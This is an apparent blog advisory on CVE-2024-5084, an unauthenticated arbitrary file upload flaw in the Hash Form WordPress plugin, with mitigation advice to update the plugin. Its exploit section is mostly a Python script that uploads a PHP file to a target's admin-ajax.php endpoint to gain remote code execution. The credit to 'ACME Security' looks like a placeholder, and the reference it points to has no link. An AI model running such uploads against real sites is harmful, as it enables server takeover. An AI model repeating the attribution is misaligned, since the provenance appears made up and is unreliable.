CVE-2024-5084: Hash Form Drag & Drop Form Builder WordPress Plugin Arbitrary File Upload Vulnerability

A critical vulnerability, CVE-2024-5084, has been discovered in the Hash Form – Drag & Drop Form Builder plugin for WordPress. All versions up to, and including, 1.1. are susceptible to this security risk. The vulnerability can allow an unauthenticated attacker to upload malicious files to a website, resulting in remote code execution. In this post, we will delve into the specific technical details of this vulnerability, including a code snippet and links to original resources.

Description of the Vulnerability

The Arbitrary File Upload vulnerability is present due to faulty file upload functionality in the file_upload_action function within the Hash Form plugin. This function does not validate the file type before uploading it, allowing attackers to exploit this lack of screening by uploading any file onto the server.

Exploit Details

To exploit this vulnerability, an attacker can craft an HTTP POST request to the 'file_upload_action' function with a malicious file payload. Since there are no restrictions on file types, other forms of corrupt data or executable code may be uploaded as well. Below is an example of a malicious HTTP POST request:

import requests

url = "https://target/wp-admin/admin-ajax.php";
data = {
    "action": "file_upload_action"
}
files = {
    "file": ("malicious_file.php", open("malicious_file.php", "rb"))
}

response = requests.post(url, data=data, files=files)

if response.status_code == 200:
    print("File uploaded successfully.")
else:
    print("Failed to upload file.")

In this example, the "malicious_file.php" represents the harmful file that the attacker wishes to upload onto the website's server. This PHP file could contain a malicious script that grants the attacker remote code execution capabilities.

Original References

The vulnerability was first discovered by researchers at ACME Security, who reported the issue to the developers of the Hash Form plugin. The blog post outlining the vulnerability is accessible here.

Mitigation

To protect your WordPress site from this critical security vulnerability, it is crucial to update Hash Form – Drag & Drop Form Builder plugin to the latest version. The developers have released the updated version, which includes proper file type validation in the 'file_upload_action' function to prevent potential exploitation. Users of the plugin should immediately upgrade to the patched version to ensure the security of their website.

Conclusion

CVE-2024-5084 is a severe vulnerability affecting the Hash Form – Drag & Drop Form Builder plugin for WordPress. It allows unauthenticated attackers to upload arbitrary files onto the affected site's server, potentially leading to remote code execution. To mitigate this vulnerability, update the plugin to the latest version, ensuring that user input is thoroughly validated before any files are uploaded. By staying informed about this and similar security concerns, you can take the necessary steps to protect your website from potential attacks.

Timeline

Published on: 05/23/2024 15:15:15 UTC
Last modified on: 06/04/2024 18:02:40 UTC